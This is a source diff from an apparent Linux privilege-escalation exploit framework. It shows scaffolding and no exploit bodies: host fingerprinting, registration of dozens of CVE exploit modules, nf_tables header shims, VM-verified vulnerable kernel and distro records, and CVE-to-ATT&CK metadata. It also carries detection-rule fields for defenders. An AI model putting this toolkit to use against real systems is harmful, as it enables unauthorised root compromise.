+ * call (~50ms; dominated by the userns fork-probe), are cached, and
+ * subsequent calls are free.
+ *
+ * Probing is best-effort: missing files / unsupported sysctls leave
+ * the corresponding bool false. The function does not fail. */
+const struct skeletonkey_host *skeletonkey_host_get(void);
+
+/* Print a two-line "host fingerprint" banner to stderr suitable for
+ * --auto / --scan verbose output. Silent on JSON mode. */
+void skeletonkey_host_print_banner(const struct skeletonkey_host *h, bool json);
+
+/* True iff h->kernel >= the (major, minor, patch) provided. Returns
+ * false if h is NULL or its kernel version was never populated (major
+ * == 0). Replaces the manual `v->major < X` / `(v->major == X &&
+ * v->minor < Y)` patterns scattered across detect()s — cleaner reads
+ * and one place to get the comparison right.
+ *
+ * Examples:
+ *   if (!host_kernel_at_least(h, 7, 0, 0))    // kernel predates 7.0
+ *       return SKELETONKEY_OK;
+ *   if ( host_kernel_at_least(h, 6, 8, 0))    // kernel post-fix
+ *       return SKELETONKEY_OK;
+ */
+bool skeletonkey_host_kernel_at_least(const struct skeletonkey_host *h,
+                                      int major, int minor, int patch);
+
+/* True iff h->kernel is in [lo, hi). Useful for "vulnerable range"
+ * gates where the simple `kernel_range_is_patched` backport model
+ * doesn't apply — e.g. a feature added in X.Y and removed/superseded
+ * in W.Z, or a per-module "vulnerable only on these specific kernel
+ * lines" check.
+ *
+ * Equivalent to:
+ *   host_kernel_at_least(h, lo...) && !host_kernel_at_least(h, hi...)
+ *
+ * For "predates the bug" alone use host_kernel_at_least directly; the
+ * `in_range` form is for the bounded interval case.
+ *
+ * Example:
+ *   if (host_kernel_in_range(h, 5, 8, 0,  5, 17, 0))
+ *       // kernel 5.8 ≤ K < 5.17 — vulnerable window per the mainline
+ *       // introduction/fix dates (ignoring stable backports)
+ */
+bool skeletonkey_host_kernel_in_range(const struct skeletonkey_host *h,
+                                      int lo_major, int lo_minor, int lo_patch,
+                                      int hi_major, int hi_minor, int hi_patch);
+
+#endif /* SKELETONKEY_HOST_H */
@@ -40,9 +40,12 @@ typedef enum {
    SKELETONKEY_EXPLOIT_OK      = 5,
 } skeletonkey_result_t;

-/* Per-invocation context passed to module callbacks. Lightweight for
- * now; will grow as modules need shared state (host fingerprint,
- * leaked kbase, etc.). */
+/* Per-invocation context passed to module callbacks. The host
+ * fingerprint (kernel / distro / capability gates / service presence)
+ * is populated once at startup by core/host.c and handed to every
+ * module callback here — see core/host.h. */
+struct skeletonkey_host;   /* forward decl; full def in core/host.h */
+
 struct skeletonkey_ctx {
    bool          no_color;     /* --no-color */
    bool          json;         /* --json (machine-readable output) */
@@ -50,6 +53,13 @@ struct skeletonkey_ctx {
    bool          no_shell;     /* --no-shell (exploit prep but don't pop) */
    bool          authorized;   /* user typed --i-know on exploit */
    bool          full_chain;   /* --full-chain (attempt root-pop after primitive) */
+    bool          dry_run;      /* --dry-run (preview only; never call exploit/mitigate/cleanup) */
+
+    /* Host fingerprint — see core/host.h. Stable pointer, populated
+     * once by main() before any module callback runs. Modules that
+     * want to consult it #include "../../core/host.h". May be NULL
+     * only in degenerate test contexts; main() always sets it. */
+    const struct skeletonkey_host *host;
 };

 struct skeletonkey_module {
@@ -94,6 +104,46 @@ struct skeletonkey_module {
    const char *detect_sigma;    /* sigma YAML content */
    const char *detect_yara;     /* yara rules content */
    const char *detect_falco;    /* falco rules content */
+
+    /* Operational-security notes — telemetry footprint THIS specific
+     * exploit leaves behind. The inverse of detect_auditd/yara/falco
+     * above (the rules catch what these notes describe). Free-form
+     * prose, conventionally listing: dmesg lines triggered, auditd
+     * events, file artifacts created/modified, persistence side-
+     * effects, recommended cleanup. Per-module (not per-CVE) because
+     * different exploits for the same bug can leave different
+     * footprints. NULL if no analysis written yet.
+     *
+     * NB: ATT&CK / CWE / KEV metadata is properties of the CVE itself
+     * (independent of exploit technique) and lives in
+     * core/cve_metadata.{h,c} — looked up by CVE id, refreshed via
+     * tools/refresh-cve-metadata.py. */
+    const char *opsec_notes;
+
+    /* Architecture support for the exploit() body. detect() works on
+     * any Linux arch (it just consults ctx->host); the question this
+     * field answers is: if this module says VULNERABLE, will the
+     * --exploit path actually fire on aarch64 / arm64? Values:
+     *
+     *   "any"            — userspace bug or arch-agnostic kernel
+     *                      primitive (pwnkit, sudo*, pack2theroot,
+     *                      dirty_pipe, dirty_cow, most netfilter/fs
+     *                      bugs that use msg_msg sprays + structural
+     *                      escapes).
+     *   "x86_64"         — strictly x86-only (entrybleed needs
+     *                      prefetchnta + KPTI, which doesn't apply
+     *                      to ARM's TTBR_EL0/EL1 model).
+     *   "x86_64+unverified-arm64" — exploit body likely works on
+     *                      arm64 but hasn't been verified on a real
+     *                      arm64 host yet (e.g. copy_fail_family
+     *                      assumes some x86_64 struct offsets;
+     *                      --full-chain finisher uses x86_64-style
+     *                      kernel ROP gadgets).
+     *
+     * NULL = unmapped (treat as "x86_64+unverified-arm64" by default;
+     * a future arm64-on-Vagrant sweep will fill these in). Surfaced
+     * in --list (ARCH column) and --module-info. */
+    const char *arch_support;
 };

 #endif /* SKELETONKEY_MODULE_H */
@@ -0,0 +1,98 @@
+/*
+ * SKELETONKEY — nf_tables uapi compat shims.
+ *
+ * Older distro kernel headers (e.g. Ubuntu 20.04's linux-libc-dev ships
+ * the 5.4 uapi; Debian 11 ships 5.10) don't define every nft attribute
+ * or chain flag the exploits use. The numeric values are stable kernel
+ * ABI — the target kernel understands them at runtime regardless of
+ * what was present in the build host's uapi headers. Conditionally
+ * define them here so modules compile against any reasonable header set.
+ *
+ * Sources for the numeric values:
+ *   include/uapi/linux/netfilter/nf_tables.h in mainline at the kernel
+ *   version that introduced each enum.
+ *
+ * Include AFTER <linux/netfilter/nf_tables.h>.
+ */
+
+#ifndef SKELETONKEY_NFT_COMPAT_H
+#define SKELETONKEY_NFT_COMPAT_H
+
+#include <linux/netfilter/nf_tables.h>
+
+/* ── chain flags ─────────────────────────────────────────────────── */
+
+/* NFT_CHAIN_HW_OFFLOAD: kernel 5.5 (commit be0b86e0594d). Needed by
+ * nft_fwd_dup_cve_2022_25636. */
+#ifndef NFT_CHAIN_HW_OFFLOAD
+#define NFT_CHAIN_HW_OFFLOAD  0x2
+#endif
+
+/* NFT_CHAIN_BINDING: kernel 5.9 (commit d164385ec572). */
+#ifndef NFT_CHAIN_BINDING
+#define NFT_CHAIN_BINDING     0x4
+#endif
+
+/* ── chain attrs ─────────────────────────────────────────────────── */
+
+/* NFTA_CHAIN_FLAGS: kernel 5.7 (commit 65038428b2c6). Ubuntu 18.04's
+ * 4.15-era uapi lacks it. Position 10 in the enum
+ * (NFTA_CHAIN_TABLE=1..NFTA_CHAIN_USERDATA=9, NFTA_CHAIN_FLAGS=10). */
+#ifndef NFTA_CHAIN_FLAGS
+#define NFTA_CHAIN_FLAGS      10
+#endif
+
+/* NFTA_CHAIN_ID: kernel 5.13 (commit 837830a4b439). */
+#ifndef NFTA_CHAIN_ID
+#define NFTA_CHAIN_ID         11
+#endif
+
+/* ── verdict attrs ──────────────────────────────────────────────── */
+
+/* NFTA_VERDICT_CHAIN_ID: kernel 5.14 (commit 4ed8eb6570a4). Needed by
+ * nf_tables_cve_2024_1086. */
+#ifndef NFTA_VERDICT_CHAIN_ID
+#define NFTA_VERDICT_CHAIN_ID 3   /* CODE=1, CHAIN=2, CHAIN_ID=3 */
+#endif
+
+/* ── set attrs ──────────────────────────────────────────────────── */
+
+/* NFTA_SET_DESC_CONCAT: kernel 5.6 (commit 8aeff38e08d2 — concat sets). */
+#ifndef NFTA_SET_DESC_CONCAT
+#define NFTA_SET_DESC_CONCAT  2   /* DESC_SIZE=1, DESC_CONCAT=2 */
+#endif
+
+/* NFTA_SET_EXPR: kernel 5.12 (commit 65038428b2c6 — anon expr on sets). */
+#ifndef NFTA_SET_EXPR
+#define NFTA_SET_EXPR         13
+#endif
+
+/* NFTA_SET_EXPRESSIONS: kernel 5.16 (commit 48b0ae046ed4). */
+#ifndef NFTA_SET_EXPRESSIONS
+#define NFTA_SET_EXPRESSIONS  14
+#endif
+
+/* ── set-element attrs ──────────────────────────────────────────── */
+
+/* NFTA_SET_ELEM_KEY_END: kernel 5.6 (commit 7b225d0b5c5b). */
+#ifndef NFTA_SET_ELEM_KEY_END
+#define NFTA_SET_ELEM_KEY_END 7
+#endif
+
+/* NFTA_SET_ELEM_EXPRESSIONS: kernel 5.16 (commit 48b0ae046ed4). */
+#ifndef NFTA_SET_ELEM_EXPRESSIONS
+#define NFTA_SET_ELEM_EXPRESSIONS 11
+#endif
+
+/* ── data attrs (newer additions tend to be backported uneven) ──── */
+
+/* Make sure NFTA_DATA_VERDICT and friends exist — present since 3.13;
+ * here only as a tripwire if a very old header somehow lacks them. */
+#ifndef NFTA_DATA_VERDICT
+#define NFTA_DATA_VERDICT     2
+#endif
+#ifndef NFTA_DATA_VALUE
+#define NFTA_DATA_VALUE       1
+#endif
+
+#endif /* SKELETONKEY_NFT_COMPAT_H */
@@ -3,6 +3,11 @@
 *
 * Simple flat array. Resized in chunks of 16. We never expect more
 * than a few dozen modules, so this is fine.
+ *
+ * The canonical "register every family" enumeration lives in
+ * registry_all.c — kept separate so this file links into the
+ * standalone kernel_range unit-test binary without pulling in every
+ * module's symbol.
 */

 #include "registry.h"
@@ -40,5 +40,27 @@ void skeletonkey_register_nft_set_uaf(void);
 void skeletonkey_register_af_unix_gc(void);
 void skeletonkey_register_nft_fwd_dup(void);
 void skeletonkey_register_nft_payload(void);
+void skeletonkey_register_sudo_samedit(void);
+void skeletonkey_register_sequoia(void);
+void skeletonkey_register_sudoedit_editor(void);
+void skeletonkey_register_vmwgfx(void);
+void skeletonkey_register_dirtydecrypt(void);
+void skeletonkey_register_fragnesia(void);
+void skeletonkey_register_pack2theroot(void);
+void skeletonkey_register_sudo_chwoot(void);
+void skeletonkey_register_udisks_libblockdev(void);
+void skeletonkey_register_pintheft(void);
+void skeletonkey_register_mutagen_astronomy(void);
+void skeletonkey_register_sudo_runas_neg1(void);
+void skeletonkey_register_tioscpgrp(void);
+void skeletonkey_register_vsock_uaf(void);
+void skeletonkey_register_nft_pipapo(void);
+
+/* Call every skeletonkey_register_<family>() above in canonical order.
+ * Single source of truth so the main binary and the test binary stay
+ * in sync — adding a new module is one register_* declaration here
+ * and one call inside skeletonkey_register_all_modules() in
+ * core/registry.c (the test harness picks it up automatically). */
+void skeletonkey_register_all_modules(void);

 #endif /* SKELETONKEY_REGISTRY_H */
@@ -0,0 +1,54 @@
+/*
+ * SKELETONKEY — canonical "register every module family" enumeration.
+ *
+ * Kept in its own translation unit so registry.c stays standalone:
+ * the kernel_range unit-test binary links registry.c (for the basic
+ * register / count / find API) without pulling in every module's
+ * symbol. The main binary and detect-integration test link this
+ * file too and get the full lineup.
+ *
+ * Adding a new module is one new register_<family>() declaration in
+ * registry.h plus one call below — the integration test picks it up
+ * via skeletonkey_register_all_modules() in its main().
+ */
+
+#include "registry.h"
+
+void skeletonkey_register_all_modules(void)
+{
+    skeletonkey_register_copy_fail_family();
+    skeletonkey_register_dirty_pipe();
+    skeletonkey_register_entrybleed();
+    skeletonkey_register_pwnkit();
+    skeletonkey_register_nf_tables();
+    skeletonkey_register_overlayfs();
+    skeletonkey_register_cls_route4();
+    skeletonkey_register_dirty_cow();
+    skeletonkey_register_ptrace_traceme();
+    skeletonkey_register_netfilter_xtcompat();
+    skeletonkey_register_af_packet();
+    skeletonkey_register_fuse_legacy();
+    skeletonkey_register_stackrot();
+    skeletonkey_register_af_packet2();
+    skeletonkey_register_cgroup_release_agent();
+    skeletonkey_register_overlayfs_setuid();
+    skeletonkey_register_nft_set_uaf();
+    skeletonkey_register_af_unix_gc();
+    skeletonkey_register_nft_fwd_dup();
+    skeletonkey_register_nft_payload();
+    skeletonkey_register_sudo_samedit();
+    skeletonkey_register_sequoia();
+    skeletonkey_register_sudoedit_editor();
+    skeletonkey_register_vmwgfx();
+    skeletonkey_register_dirtydecrypt();
+    skeletonkey_register_fragnesia();
+    skeletonkey_register_pack2theroot();
+    skeletonkey_register_sudo_chwoot();
+    skeletonkey_register_udisks_libblockdev();
+    skeletonkey_register_pintheft();
+    skeletonkey_register_mutagen_astronomy();
+    skeletonkey_register_sudo_runas_neg1();
+    skeletonkey_register_tioscpgrp();
+    skeletonkey_register_vsock_uaf();
+    skeletonkey_register_nft_pipapo();
+}
@@ -0,0 +1,329 @@
+/*
+ * SKELETONKEY — verification records table
+ *
+ * AUTO-GENERATED by tools/refresh-verifications.py from
+ * docs/VERIFICATIONS.jsonl. Do not hand-edit; rerun the script.
+ *
+ * Source: tools/verify-vm/verify.sh appends one JSON record per
+ * run; this generator dedupes to (module, vm_box, kernel, expect)
+ * and keeps the latest by verified_at.
+ */
+
+#include "verifications.h"
+
+#include <stddef.h>
+#include <string.h>
+#include <stdbool.h>
+
+const struct verification_record verifications[] = {
+    {
+        .module        = "af_packet",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "4.15.0-213-generic",
+        .host_distro   = "Ubuntu 18.04.6 LTS",
+        .vm_box        = "generic/ubuntu1804",
+        .expect_detect = "OK",
+        .actual_detect = "OK",
+        .status        = "match",
+    },
+    {
+        .module        = "af_packet2",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "5.4.0-169-generic",
+        .host_distro   = "Ubuntu 20.04.6 LTS",
+        .vm_box        = "generic/ubuntu2004",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "af_unix_gc",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "5.15.5-051505-generic",
+        .host_distro   = "Ubuntu 22.04.3 LTS",
+        .vm_box        = "generic/ubuntu2204",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "cgroup_release_agent",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "5.10.0-27-amd64",
+        .host_distro   = "Debian GNU/Linux 11 (bullseye)",
+        .vm_box        = "generic/debian11",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "cls_route4",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "5.15.0-43-generic",
+        .host_distro   = "Ubuntu 20.04.6 LTS",
+        .vm_box        = "generic/ubuntu2004",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "dirty_pipe",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "5.15.0-91-generic",
+        .host_distro   = "Ubuntu 22.04.3 LTS",
+        .vm_box        = "generic/ubuntu2204",
+        .expect_detect = "OK",
+        .actual_detect = "OK",
+        .status        = "match",
+    },
+    {
+        .module        = "dirtydecrypt",
+        .verified_at   = "2026-05-24",
+        .host_kernel   = "6.19.7-061907-generic",
+        .host_distro   = "Ubuntu 22.04.3 LTS",
+        .vm_box        = "generic/ubuntu2204",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "entrybleed",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "5.15.0-91-generic",
+        .host_distro   = "Ubuntu 22.04.3 LTS",
+        .vm_box        = "generic/ubuntu2204",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "fuse_legacy",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "5.10.0-27-amd64",
+        .host_distro   = "Debian GNU/Linux 11 (bullseye)",
+        .vm_box        = "generic/debian11",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "netfilter_xtcompat",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "5.10.0-27-amd64",
+        .host_distro   = "Debian GNU/Linux 11 (bullseye)",
+        .vm_box        = "generic/debian11",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "nf_tables",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "5.15.5-051505-generic",
+        .host_distro   = "Ubuntu 22.04.3 LTS",
+        .vm_box        = "generic/ubuntu2204",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "nft_fwd_dup",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "5.10.0-27-amd64",
+        .host_distro   = "Debian GNU/Linux 11 (bullseye)",
+        .vm_box        = "generic/debian11",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "nft_payload",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "5.15.0-43-generic",
+        .host_distro   = "Ubuntu 20.04.6 LTS",
+        .vm_box        = "generic/ubuntu2004",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "nft_pipapo",
+        .verified_at   = "2026-05-24",
+        .host_kernel   = "5.15.5-051505-generic",
+        .host_distro   = "Ubuntu 22.04.3 LTS",
+        .vm_box        = "generic/ubuntu2204",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "nft_set_uaf",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "5.15.5-051505-generic",
+        .host_distro   = "Ubuntu 22.04.3 LTS",
+        .vm_box        = "generic/ubuntu2204",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "overlayfs",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "5.4.0-169-generic",
+        .host_distro   = "Ubuntu 20.04.6 LTS",
+        .vm_box        = "generic/ubuntu2004",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "overlayfs_setuid",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "5.15.0-91-generic",
+        .host_distro   = "Ubuntu 22.04.3 LTS",
+        .vm_box        = "generic/ubuntu2204",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "pack2theroot",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "6.1.0-17-amd64",
+        .host_distro   = "Debian GNU/Linux 12 (bookworm)",
+        .vm_box        = "generic/debian12",
+        .expect_detect = "PRECOND_FAIL",
+        .actual_detect = "PRECOND_FAIL",
+        .status        = "match",
+    },
+    {
+        .module        = "ptrace_traceme",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "4.15.0-213-generic",
+        .host_distro   = "Ubuntu 18.04.6 LTS",
+        .vm_box        = "generic/ubuntu1804",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "pwnkit",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "5.4.0-169-generic",
+        .host_distro   = "Ubuntu 20.04.6 LTS",
+        .vm_box        = "generic/ubuntu2004",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "sequoia",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "5.4.0-169-generic",
+        .host_distro   = "Ubuntu 20.04.6 LTS",
+        .vm_box        = "generic/ubuntu2004",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "stackrot",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "6.1.10-060110-generic",
+        .host_distro   = "Ubuntu 22.04.3 LTS",
+        .vm_box        = "generic/ubuntu2204",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "sudo_chwoot",
+        .verified_at   = "2026-05-24",
+        .host_kernel   = "5.15.0-91-generic",
+        .host_distro   = "Ubuntu 22.04.3 LTS",
+        .vm_box        = "generic/ubuntu2204",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "sudo_runas_neg1",
+        .verified_at   = "2026-05-24",
+        .host_kernel   = "4.15.0-213-generic",
+        .host_distro   = "Ubuntu 18.04.6 LTS",
+        .vm_box        = "generic/ubuntu1804",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "sudo_samedit",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "4.15.0-213-generic",
+        .host_distro   = "Ubuntu 18.04.6 LTS",
+        .vm_box        = "generic/ubuntu1804",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "sudoedit_editor",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "5.15.0-91-generic",
+        .host_distro   = "Ubuntu 22.04.3 LTS",
+        .vm_box        = "generic/ubuntu2204",
+        .expect_detect = "PRECOND_FAIL",
+        .actual_detect = "PRECOND_FAIL",
+        .status        = "match",
+    },
+    {
+        .module        = "tioscpgrp",
+        .verified_at   = "2026-05-24",
+        .host_kernel   = "5.4.0-26-generic",
+        .host_distro   = "Ubuntu 20.04.6 LTS",
+        .vm_box        = "generic/ubuntu2004",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "udisks_libblockdev",
+        .verified_at   = "2026-05-24",
+        .host_kernel   = "6.1.0-17-amd64",
+        .host_distro   = "Debian GNU/Linux 12 (bookworm)",
+        .vm_box        = "generic/debian12",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+};
+
+const size_t verifications_count =
+    sizeof(verifications) / sizeof(verifications[0]);
+
+const struct verification_record *
+verifications_for_module(const char *module, size_t *count_out)
+{
+    if (count_out) *count_out = 0;
+    if (!module) return NULL;
+    const struct verification_record *first = NULL;
+    size_t n = 0;
+    for (size_t i = 0; i < verifications_count; i++) {
+        if (strcmp(verifications[i].module, module) == 0) {
+            if (first == NULL) first = &verifications[i];
+            n++;
+        }
+    }
+    if (count_out) *count_out = n;
+    return first;
+}
+
+bool verifications_module_has_match(const char *module)
+{
+    size_t n = 0;
+    const struct verification_record *r = verifications_for_module(module, &n);
+    for (size_t i = 0; i < n; i++)
+        if (r[i].status && strcmp(r[i].status, "match") == 0)
+            return true;
+    return false;
+}
@@ -0,0 +1,52 @@
+/*
+ * SKELETONKEY — per-module verification records
+ *
+ * "Verified-on" entries — concrete (distro, kernel, date) tuples where
+ * tools/verify-vm/verify.sh has empirically confirmed a module's
+ * detect() verdict against a known-vulnerable target. Each entry is one
+ * row from docs/VERIFICATIONS.jsonl, auto-generated into the C table
+ * by tools/refresh-verifications.py.
+ *
+ * Modules with >=1 record carry an empirical-trust badge ("✓ verified
+ * on Ubuntu 20.04.6 / 5.4.0") in --list / --module-info / --explain
+ * output. Modules with zero records are still tested at the unit level
+ * (synthetic fingerprints), but have not yet been confirmed on a real
+ * vulnerable kernel.
+ *
+ * Append-only by intent: each verify.sh run appends a fresh JSONL line
+ * (timestamped); the refresh script dedupes to (module, vm_box,
+ * kernel, expect_detect) when generating the C table so re-runs of the
+ * same scenario update rather than accumulate.
+ */
+
+#ifndef SKELETONKEY_VERIFICATIONS_H
+#define SKELETONKEY_VERIFICATIONS_H
+
+#include <stdbool.h>
+#include <stddef.h>
+
+struct verification_record {
+    const char *module;          /* module name (matches struct skeletonkey_module.name) */
+    const char *verified_at;     /* "YYYY-MM-DD" (date-only; full timestamp truncated) */
+    const char *host_kernel;     /* uname -r value, e.g. "5.4.0-169-generic" */
+    const char *host_distro;     /* /etc/os-release PRETTY_NAME, e.g. "Ubuntu 20.04.6 LTS" */
+    const char *vm_box;          /* vagrant box name, e.g. "generic/ubuntu2004" */
+    const char *expect_detect;   /* "VULNERABLE" / "OK" / "PRECOND_FAIL" — what targets.yaml said */
+    const char *actual_detect;   /* what skeletonkey --explain returned */
+    const char *status;          /* "match" iff actual == expected; otherwise "MISMATCH" */
+};
+
+extern const struct verification_record verifications[];
+extern const size_t                      verifications_count;
+
+/* Returns the first record (count via *count_out) for the named module,
+ * or NULL if the module has no recorded verifications. The records are
+ * stored contiguously in the table, so once you have the pointer you
+ * can iterate count_out entries forward. */
+const struct verification_record *
+verifications_for_module(const char *module, size_t *count_out);
+
+/* True iff the module has at least one "match" record. */
+bool verifications_module_has_match(const char *module);
+
+#endif /* SKELETONKEY_VERIFICATIONS_H */
@@ -82,7 +82,11 @@ Code that more than one module needs lives in `core/`:

 1. Parse args (`--scan`, `--exploit <name>`, `--mitigate`,
   `--detect-rules`, `--cleanup`, etc.)
-2. Fingerprint the host
+2. **Fingerprint the host** — `core/host.c` is called once at startup
+   to populate `struct skeletonkey_host` (kernel version + arch +
+   distro + capability gates + service presence). The result is
+   handed to every module via `ctx->host`. See "Host fingerprint"
+   below.
 3. For `--scan`: iterate module registry, call each module's
   `detect()`, emit table of results
 4. For `--exploit <name>`: locate module, gate behind `--i-know`,
@@ -90,6 +94,44 @@ Code that more than one module needs lives in `core/`:
 5. For `--detect-rules`: walk module registry, concatenate detection
   files in the requested format

+## Host fingerprint (`core/host.{h,c}`)
+
+A single `struct skeletonkey_host` is populated once at startup and
+exposed to every module via `ctx->host` (a stable pointer for the
+process lifetime). It carries:
+
+- **Identity:** `struct kernel_version kernel` + arch + nodename +
+  distro id/version/pretty (parsed from `/etc/os-release`).
+- **Process state:** euid, real_uid (defeats the userns illusion by
+  reading `/proc/self/uid_map`), egid, username, is_root,
+  is_ssh_session.
+- **Platform family:** is_linux, is_debian_family, is_rpm_family,
+  is_arch_family, is_suse_family.
+- **Capability gates (Linux):** unprivileged_userns_allowed (live
+  fork-probe), apparmor_restrict_userns, unprivileged_bpf_disabled,
+  kpti_enabled, kernel_lockdown_active, selinux_enforcing,
+  yama_ptrace_restricted.
+- **System services:** has_systemd, has_dbus_system.
+
+Modules that want to consult the fingerprint do:
+
+```c
+#include "../../core/host.h"
+/* ... */
+if (ctx->host && !ctx->host->unprivileged_userns_allowed)
+    return SKELETONKEY_PRECOND_FAIL;
+if (ctx->host->kernel.major < 7)
+    return SKELETONKEY_OK;   /* predates the bug */
+```
+
+The migration is opt-in per module — modules that don't `#include`
+host.h continue to do their own probes; modules that do save the
+duplicate work and get a consistent view across the whole scan.
+
+`--auto` and `--scan` (in verbose mode) print a two-line banner of
+the fingerprint via `skeletonkey_host_print_banner()` so operators
+can see at a glance which gates are open.
+
 ## CI matrix

 `.github/workflows/ci.yml` (planned, Phase 4) runs each module's
@@ -0,0 +1,236 @@
+[
+  {
+    "cve": "CVE-2016-5195",
+    "module_dir": "dirty_cow_cve_2016_5195",
+    "cwe": "CWE-362",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": true,
+    "kev_date_added": "2022-03-03"
+  },
+  {
+    "cve": "CVE-2017-7308",
+    "module_dir": "af_packet_cve_2017_7308",
+    "cwe": "CWE-681",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": false,
+    "kev_date_added": ""
+  },
+  {
+    "cve": "CVE-2019-13272",
+    "module_dir": "ptrace_traceme_cve_2019_13272",
+    "cwe": null,
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": true,
+    "kev_date_added": "2021-12-10"
+  },
+  {
+    "cve": "CVE-2020-14386",
+    "module_dir": "af_packet2_cve_2020_14386",
+    "cwe": "CWE-250",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": false,
+    "kev_date_added": ""
+  },
+  {
+    "cve": "CVE-2021-22555",
+    "module_dir": "netfilter_xtcompat_cve_2021_22555",
+    "cwe": "CWE-787",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": true,
+    "kev_date_added": "2025-10-06"
+  },
+  {
+    "cve": "CVE-2021-3156",
+    "module_dir": "sudo_samedit_cve_2021_3156",
+    "cwe": "CWE-193",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": true,
+    "kev_date_added": "2022-04-06"
+  },
+  {
+    "cve": "CVE-2021-33909",
+    "module_dir": "sequoia_cve_2021_33909",
+    "cwe": "CWE-190",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": false,
+    "kev_date_added": ""
+  },
+  {
+    "cve": "CVE-2021-3493",
+    "module_dir": "overlayfs_cve_2021_3493",
+    "cwe": "CWE-270",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": true,
+    "kev_date_added": "2022-10-20"
+  },
+  {
+    "cve": "CVE-2021-4034",
+    "module_dir": "pwnkit_cve_2021_4034",
+    "cwe": "CWE-787",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": true,
+    "kev_date_added": "2022-06-27"
+  },
+  {
+    "cve": "CVE-2022-0185",
+    "module_dir": "fuse_legacy_cve_2022_0185",
+    "cwe": "CWE-190",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": true,
+    "kev_date_added": "2024-08-21"
+  },
+  {
+    "cve": "CVE-2022-0492",
+    "module_dir": "cgroup_release_agent_cve_2022_0492",
+    "cwe": "CWE-287",
+    "attack_technique": "T1611",
+    "attack_subtechnique": null,
+    "in_kev": false,
+    "kev_date_added": ""
+  },
+  {
+    "cve": "CVE-2022-0847",
+    "module_dir": "dirty_pipe_cve_2022_0847",
+    "cwe": "CWE-665",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": true,
